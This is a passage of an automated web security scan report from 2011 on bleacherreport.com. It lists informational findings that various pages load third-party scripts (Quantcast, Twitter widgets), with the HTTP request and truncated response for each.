Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 279
ETag: "ca7345827db64557efe026a6506f01e7"
Date: Tue, 15 Feb 2011 15:55:14 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 56937
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.4. http://bleacherreport.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 80
ETag: "505c9f2188b636436bcab7390930e623"
Date: Tue, 15 Feb 2011 15:56:01 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 31514
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.5. http://bleacherreport.com/advertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /advertise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advertise HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 36
ETag: "7bf89c66c4d1832b4d15c8e80603c103"
Date: Tue, 15 Feb 2011 15:56:12 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 31444
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.6. http://bleacherreport.com/archives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /archives

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 1346
ETag: "7cf88ec5c20322348aa262f11c5f77e4"
Date: Tue, 15 Feb 2011 15:57:44 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 53929
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.7. http://bleacherreport.com/archives/newswires  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /archives/newswires

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/newswires HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 640
ETag: "9f9db30d0bae5b6fab48aab3dfea6451"
Date: Tue, 15 Feb 2011 15:57:52 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 45105
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.8. http://bleacherreport.com/articles/599610-follow-the-leader-the-top-5-nhl-captains-of-all-time  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/599610-follow-the-leader-the-top-5-nhl-captains-of-all-time

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/599610-follow-the-leader-the-top-5-nhl-captains-of-all-time HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 445
ETag: "97c214f7b5f0ba9ac6ae439a0bad4ac3"
Date: Tue, 15 Feb 2011 15:53:48 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 72396
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.9. http://bleacherreport.com/articles/600732-arsenal-vs-barcelona-the-fans-view-part-2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/600732-arsenal-vs-barcelona-the-fans-view-part-2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/600732-arsenal-vs-barcelona-the-fans-view-part-2 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 572
ETag: "bc12016085628e2b44bd6b211c03cba7"
Date: Tue, 15 Feb 2011 15:53:43 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 83991
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.10. http://bleacherreport.com/articles/604763-greatest-moments-in-wag-history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/604763-greatest-moments-in-wag-history

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/604763-greatest-moments-in-wag-history HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 98
ETag: "52dd5a2d085129300f1b274ce7d66720"
Date: Tue, 15 Feb 2011 15:53:51 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 85312
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.11. http://bleacherreport.com/articles/606334-25-bold-post-all-star-break-predictions-for-the-nba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/606334-25-bold-post-all-star-break-predictions-for-the-nba

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/606334-25-bold-post-all-star-break-predictions-for-the-nba HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 153
ETag: "367d9acbee07a2dda742f6aeeff209b1"
Date: Tue, 15 Feb 2011 15:54:14 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 100581
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.12. http://bleacherreport.com/articles/606389-mother-or-all-mocks-the-results-50-nfl-mock-drafts-all-rolled-into-one  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/606389-mother-or-all-mocks-the-results-50-nfl-mock-drafts-all-rolled-into-one

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/606389-mother-or-all-mocks-the-results-50-nfl-mock-drafts-all-rolled-into-one HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 158
ETag: "a4c5243c3aba4755956f6420c24d5642"
Date: Tue, 15 Feb 2011 15:53:25 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 139089
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.13. http://bleacherreport.com/articles/606421-new-york-yankees-the-most-underrated-player-at-each-position-in-team-history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/606421-new-york-yankees-the-most-underrated-player-at-each-position-in-team-history

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/606421-new-york-yankees-the-most-underrated-player-at-each-position-in-team-history HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 140
ETag: "7f5b580bb94cd6aa192b54327090d097"
Date: Tue, 15 Feb 2011 15:54:03 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 86334
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.14. http://bleacherreport.com/articles/607573-sidney-crosby-why-his-concussions-could-make-him-the-new-eric-lindros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/607573-sidney-crosby-why-his-concussions-could-make-him-the-new-eric-lindros

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/607573-sidney-crosby-why-his-concussions-could-make-him-the-new-eric-lindros HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 433
ETag: "8c0ec235d1914f5c5e362dcbc919f65d"
Date: Tue, 15 Feb 2011 15:53:44 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 64244
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.15. http://bleacherreport.com/articles/607803-fedor-emelianenkos-15-most-captivating-moments-during-his-illustrious-career  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/607803-fedor-emelianenkos-15-most-captivating-moments-during-his-illustrious-career

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/607803-fedor-emelianenkos-15-most-captivating-moments-during-his-illustrious-career HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 100
ETag: "e9f69bdb2ee542a5544e8a2eb6419660"
Date: Tue, 15 Feb 2011 15:53:53 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 86773
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.16. http://bleacherreport.com/articles/607928-brock-lesnar-and-10-fighters-wed-love-to-see-anderson-silva-kick-in-the-face  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/607928-brock-lesnar-and-10-fighters-wed-love-to-see-anderson-silva-kick-in-the-face

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/607928-brock-lesnar-and-10-fighters-wed-love-to-see-anderson-silva-kick-in-the-face HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 501
ETag: "9556001366115362ad0ba56dcbbb1cbf"
Date: Tue, 15 Feb 2011 15:53:52 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 69829
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.17. http://bleacherreport.com/articles/608252-ronaldos-greatest-career-moments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608252-ronaldos-greatest-career-moments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608252-ronaldos-greatest-career-moments HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 132
ETag: "59418ef3e861dcc537fd7cb68233c9e0"
Date: Tue, 15 Feb 2011 15:53:33 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 74215
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.18. http://bleacherreport.com/articles/608255-san-antonio-spurs-nba-trade-rumors-10-minor-trade-ideas-to-keep-lead-in-west  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608255-san-antonio-spurs-nba-trade-rumors-10-minor-trade-ideas-to-keep-lead-in-west

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608255-san-antonio-spurs-nba-trade-rumors-10-minor-trade-ideas-to-keep-lead-in-west HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 171
ETag: "fb2a5b799601f325c99007192b6b5c8b"
Date: Tue, 15 Feb 2011 15:54:14 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 81811
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.19. http://bleacherreport.com/articles/608304-carmelo-anthony-amare-stoudemire-can-the-two-coexist-on-the-new-york-knicks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608304-carmelo-anthony-amare-stoudemire-can-the-two-coexist-on-the-new-york-knicks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608304-carmelo-anthony-amare-stoudemire-can-the-two-coexist-on-the-new-york-knicks HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 260
ETag: "c73fc2ae206f4d93e3e5aa3f49f0bbef"
Date: Tue, 15 Feb 2011 15:54:13 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 70593
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.20. http://bleacherreport.com/articles/608405-sec-football-recruiting-is-recruiting-turning-into-a-side-show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608405-sec-football-recruiting-is-recruiting-turning-into-a-side-show

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608405-sec-football-recruiting-is-recruiting-turning-into-a-side-show HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 139
ETag: "efd96af092555a8e979e389ee9586b39"
Date: Tue, 15 Feb 2011 15:53:28 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 67649
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.21. http://bleacherreport.com/articles/608408-mario-lemieux-why-he-spoke-out-and-where-the-nhl-goes-from-here  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608408-mario-lemieux-why-he-spoke-out-and-where-the-nhl-goes-from-here

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608408-mario-lemieux-why-he-spoke-out-and-where-the-nhl-goes-from-here HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 688
ETag: "644ba379d37b3a19bec68df526a7222d"
Date: Tue, 15 Feb 2011 15:53:46 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 75025
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.22. http://bleacherreport.com/articles/608428-nba-rankings-which-teams-have-over-and-underachieved-this-season  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608428-nba-rankings-which-teams-have-over-and-underachieved-this-season

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608428-nba-rankings-which-teams-have-over-and-underachieved-this-season HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 416
ETag: "89fb3194c7514aabc97d8d8b4776117b"
Date: Tue, 15 Feb 2011 15:53:20 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 100276
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
